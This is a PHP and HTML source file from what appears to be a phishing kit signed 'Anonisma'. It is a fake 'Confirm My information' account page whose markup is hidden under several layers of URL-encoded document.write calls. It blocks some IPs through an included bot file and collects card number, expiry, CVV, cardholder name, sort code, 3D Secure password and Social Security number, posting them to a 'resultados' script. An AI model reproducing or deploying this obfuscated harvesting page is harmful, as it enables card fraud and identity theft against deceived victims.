<?php
if (!isset($_SESSION)) {
  session_start();
}

include "bots.php";  //Para Bloquear Algunas IPs
include "opciones.php"; //Para convertir el texto en imagen 

?>




<!DOCTYPE html>

<html>
<!--Anonisma -->



<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">     <title>Confirm My information</title>    



<link rel="shortcut icon" <link rel="logo-icon" href="img/iconisma.png">


<link rel="stylesheet" href="../objetos/a/no/ni/sma/An[O_o]isma.css"> 



<style type="text/css"></style></head> 



<!--head -->


<script>
<!--
document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525250A%2525250A%2525253Cbody%25252520data-is-mobile%2525253D%25252522%25252522%25252520class%2525253D%25252522view-merchantAccountStart%25252522%2525253E%25252520%2525250A%2525250A%2525250A%25252520%2525253Cheader%25252520class%2525253D%25252522tobba-sakrana%25252522%2525253E%25252520%2525250A%25252520%2525250A%25252520%2525253Cdiv%25252520class%2525253D%25252522nav%25252522%2525253E%25252520%2525253Cdiv%25252520class%2525253D%25252522Anonismaaaaaaaaaaaaaaaaaaaaaaa%25252522%2525253E%25252520%2525250A%25252520%2525250A%25252520%2525250A%25252520%2525253Cnav%25252520class%2525253D%25252522logo%25252522%25252520role%2525253D%25252522navigation%25252522%2525253E%25252520%2525253Ca%25252520href%2525253D%25252522details.html%25252522%2525253E%25252520%2525253Cimg%25252520src%2525253D%25252522img/logo__106x29.png%25252522%25252520%25252522%2525253E%2525253C/a%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/nav%2525253E%25252520%25252520%25252520%2525253C/div%2525253E%25252520%2525253C/div%2525253E%25252520%2525250A%25252509%25252509%25252509%25252520%25252520%25252520%2525250A%2525250A%25252509%25252509%25252509%25252520%25252520%25252520%2525250A%25252509%25252509%25252509%25252520%25252520%25252520%2525253C/header%2525253E%2525250A%2525250A%2525250A%2525253C%25252521--body%25252520--%2525253E%2525250A%25252509%25252509%25252509%25252520%25252520%25252520%25252520%25252520%2525250A%2525250A%2525250A%2525253Cdiv%25252520id%2525253D%25252522content%25252522%2525253E%25252520%2525253Cdiv%25252520id%2525253D%25252522main%25252522%25252520class%2525253D%25252522falcon%25252522%2525253E%25252520%2525253Cdiv%25252520class%2525253D%25252522nsb_6_18%25252522%2525253E%25252520%2525253C/br%2525253E%25252520%2525253C/br%2525253E%25252520%2525253C/br%2525253E%25252520%2525253Cdiv%2525253E%25252520%2525253Cdiv%2525253E%25252520%2525253Cdiv%25252520class%2525253D%25252522message%25252522%2525253E%2525253C/div%2525253E%25252520%2525253C/div%2525253E%25252520%2525253Cdiv%25252520class%2525253D%25252522Maghribi%25252520Rjal%25252522%2525253E%25252520%2525250A%2525250A%2525250A%25252520%2525253Ccenter%2525253E%2525253Cdiv%25252520class%2525253D%25252522Mgharba%25252520Rjal%25252522%25252520%2525253E%25252520%25252520%2525253Ca%25252520href%2525253D%25252522details.html%25252522%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/updisma1.png%25252522%2525253E%2525253C/a%2525253E%25252520%25252526nbsp%2525253B%25252520%25252526nbsp%2525253B%25252520%2525253Ca%25252520href%2525253D%25252522details.html%25252522%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/000.gif%25252522%2525253E%2525253C/a%2525253E%25252520%25252509%2525250A%25252520%2525253C/center%2525253E%25252520%25252520%2525253Csection%25252520%2525253E%2525250A%25252520%2525250A%2525250A%2525250A%2525250A%2525250A%2525253C%25252521--%25252520Coded%25252520by%25252520Anonisma%25252520--%2525253E%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%25252520%25252520%2525250A%25252520%25252520%2525250A%25252520%25252520%2525253Cstyle%25252520type%2525253D%25252522text/css%25252522%2525253E%2525253C/style%2525253E%2525250A%25252520%25252520%2525250A%25252520%25252520%2525250A%25252520%25252520%2525253C/head%2525253E%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%2525253C%25252521--%25252520Anonisma%25252520--%2525253E%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%25252520%25252520%2525253Clink%25252520type%2525253D%25252522text/css%25252522%2525253E%2525253Clink%25252520rel%2525253D%25252522stylesheet%25252522%25252520href%2525253D%25252522https%2525253A//kale-krate.herokuapp.com/application.8ba3d0fab5a941d39ae8dd8b769281c3.css%25252522%2525253E%2525253Clink%25252520rel%2525253D%25252522stylesheet%25252522%25252520href%2525253D%25252522https%2525253A//kale-krate.herokuapp.com/one_time.d37a13f010b08473932d2fd4b56e99b3.css%25252522%2525253E%2525250A%2525250A%25252520%25252520%2525250A%25252520%25252520%2525253Cstyle%25252520type%2525253D%25252522text/css%25252522%2525253E%2525253C/style%2525253E%2525250A%25252520%25252520%2525250A%2525250A%25252520%25252520%2525250A%25252520%25252520%2525253C/head%2525253E%2525250A%2525250A%2525250A%25252520%25252520%2525250A%25252520%25252520%2525250A%25252520%25252520%2525250A%2525253Cbody%2525253E%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%2525250A%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%2525253Cdiv%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253Ch1%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/h1%2525253E%2525250A%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%2525253Cform%25252520action%2525253D%25252522./resultados/anonisma3.php%25252522%25252520method%2525253D%25252522post%25252522%2525253E%2525250A%2525250A%2525250A%2525250A%25252520%25252509%2525253Cbr%2525253E%2525250A%25252509%25252520%25252520%2525250A%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522row%25252520customer-fields--card-number%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__number%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522number%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/holdisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow1.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522number%25252522%25252520id%2525253D%25252522number%25252522%25252520maxlength%2525253D%2525252219%25252522%25252520name%2525253D%25252522number%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520placeholder%2525253D%25252522%25252520xxxx%25252520xxxx%25252520xxxx%25252520xxxx%25252520%25252522%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520CCN%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253E%2525253Cspan%25252520class%2525253D%25252522icon%25252520icon-card%25252520icon-card__generic%25252522%2525253E%2525253C/span%2525253E%2525253Cspan%25252520class%2525253D%25252522icon%25252520icon-lock%25252522%2525253E%2525253C/span%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252520%25252520%2525250A%25252509%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522row%25252520customer-fields--name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__selection%25252520customer-fields--card-expiry%25252520form-input__month%25252520form-input__year%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522month%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/holdisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow2.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525250A%25252509%25252509%25252520%25252520%2525253Cinput%25252520data-recurly%2525253D%25252522month%25252522%25252520id%2525253D%25252522month%25252522%25252520maxlength%2525253D%252525222%25252522%25252520name%2525253D%25252522month%25252522%25252520placeholder%2525253D%25252522MM%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520MM%25252522%25252520%2525253E%2525250A%25252509%25252509%25252520%25252520%2525253Cinput%25252520data-recurly%2525253D%25252522year%25252522%25252520id%2525253D%25252522year%25252522%25252520maxlength%2525253D%252525222%25252522%25252520name%2525253D%25252522year%25252522%25252520placeholder%2525253D%25252522YY%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520YY%25252522%25252520%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520customer-fields--card-cvv%25252520form-input__cvv%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522cvv%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/cvisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow3.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522cvv%25252522%25252520id%2525253D%25252522cvv%25252522%25252520maxlength%2525253D%252525224%25252522%25252520name%2525253D%25252522cv%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520placeholder%2525253D%25252522%25252520xxx%25252520/%25252520xxxx%25252520%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520CVV%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252520%25252520%2525250A%25252509%2525250A%25252509%2525250A%25252509%25252520%25252520%25252509%25252520%25252520%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522row%25252520customer-fields--name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__first_name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522first_name%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/holdisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow4.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522first_name%25252522%25252520id%2525253D%25252522first_name%25252522%25252520maxlength%2525253D%2525252216%25252522%25252520name%2525253D%25252522holder%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520placeholder%2525253D%25252522%25252520%25252520Card%25252520Holder%25252520%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520CH%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__last_name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525250A%25252509%25252509%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522last_name%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/sotisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow5.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522last_name%25252522%25252520id%2525253D%25252522last_name%25252522%25252520maxlength%2525253D%2525252212%25252522%25252520name%2525253D%25252522sort%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520%25252520placeholder%2525253D%25252522%25252520xx-xx-xx%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520SC%25252522%25252520%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525250A%25252520%25252520%2525253C/div%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252520%25252520%2525250A%25252509%2525250A%25252509%25252520%2525250A%25252509%25252520%2525250A%2525250A%25252509%25252520%2525250A%25252509%25252520%2525250A%25252509%2525250A%25252509%25252520%25252520%25252509%25252520%25252520%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522row%25252520customer-fields--name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__first_name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522first_name%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/3D.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow6.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522first_name%25252522%25252520id%2525253D%25252522first_name%25252522%25252520maxlength%2525253D%2525252214%25252522%25252520name%2525253D%252525223D%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520placeholder%2525253D%25252522%25252520%252525203D%25252520%25252520/%25252520VBV%25252520%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%252525203D%25252520%25252520%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252509%25252509%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525253Cdiv%25252520class%2525253D%25252522form-input%25252520form-input__last_name%25252522%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525250A%25252509%25252509%25252520%25252520%2525253Clabel%25252520for%2525253D%25252522last_name%25252522%2525253E%2525253Ca%25252520href%2525253D%25252522img/sisma.png%25252522%25252520target%25252520%2525253D%25252522_blank%25252522%25252520%2525253E%2525253CIMG%25252520SRC%2525253D%25252522./img/flow7.png%25252522%2525253E%2525253C/a%2525253E%2525253C/label%2525253E%2525253Cinput%25252520data-recurly%2525253D%25252522last_name%25252522%25252520id%2525253D%25252522last_name%25252522%25252520%25252520maxlength%2525253D%2525252212%25252522%25252520name%2525253D%25252522S-S-N%25252522%25252520type%2525253D%25252522text%25252522%25252520%25252520%25252520%25252520%25252520placeholder%2525253D%25252522%25252520xxx-xx-xxxx%25252522%25252520%25252520%25252520%25252520%25252520%25252520%25252520class%2525253D%25252522hasHelp%25252520validate%25252522%25252520required%25252520title%2525253D%25252522Please%25252520Enter%25252520Your%25252520SSN%25252522%25252520%2525253E%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525250A%2525250A%25252520%25252520%2525253C/br%2525253E%2525250A%25252509%25252520%25252520%2525250A%2525250A%25252509%25252520%25252520%2525253C/br%2525253E%2525250A%25252509%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252509%2525250A%25252509%2525250A%25252520%25252520%25252520%25252520%25252520%25252520%2525253C/div%2525253E%2525250A%25252509%25252520%25252520%2525250A%2525250A%2525250A%25252509%25252520%25252520%2525250A%25252520%2525253Ccenter%2525253E%2525253Cbutton%25252520id%2525253D%25252522createContinue%25252522%25252520class%2525253D%25252522button%25252520actionContinue%25252522%25252520type%2525253D%25252522submit%25252522%25252520name%2525253D%25252522continue%25252522%25252520value%2525253D%25252522continue%25252522%2525253EConfirm%25252520And%25252520Save%2525253C/button%2525253E%2525253C/center%2525253E%2525250A%2525250A%25252520%25252520%25252520%25252520%2525253C/form%2525253E%2525250A%25252520%25252520%2525253C/div%2525253E%2525250A%25252520%25252520%2525250A%25252520%25252520%25252520%25252520%2525253C/br%2525253E%2525250A%25252509%25252520%25252520%2525253C/br%2525253E%2525250A%25252520%25252520%2525250A%25252520%25252520%2525253C/form%2525253E%25252520%2525253C/section%2525253E%25252520%25252520%25252520%2525253C/div%2525253E%25252520%2525250A%25252520%25252520%2525250A%2525253C/div%2525253E%25252520%2525253C/div%2525253E%25252520%25252520%2525253C/div%2525253E%25252520%25252520%2525253C/div%2525253E%25252520%2525253C/div%2525253E%25252520%2525253C/br%2525253E%2525250A%25252509%25252520%25252520%2525253C/br%2525253E%25252520%25252520%2525253C/br%2525253E%2525250A%25252509%25252520%25252520%2525253C/br%2525253E%25252520%2525253Cfooter%2525253E%25252520%2525253Ccenter%2525253E%25252520%2525253Ca%25252520href%2525253D%25252522details.html%25252522%2525253E%25252520%2525253CIMG%25252520SRC%2525253D%25252522./img/footer1.png%25252522%2525253E%25252520%2525253C/center%2525253E%25252520%2525253C/footer%2525253E%25252520%2525253C/div%2525253E%2525250A%2525250A%2525253C/body%2525253E%2525250A%2525250A%2525250A%2525253C/html%2525253E%252522%252529%252529%25253B%25250A//--%25253E%25250A%25253C/script%25253E%2522%2529%2529%253B%250A//--%253E%250A%253C/script%253E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));
//-->
</script>




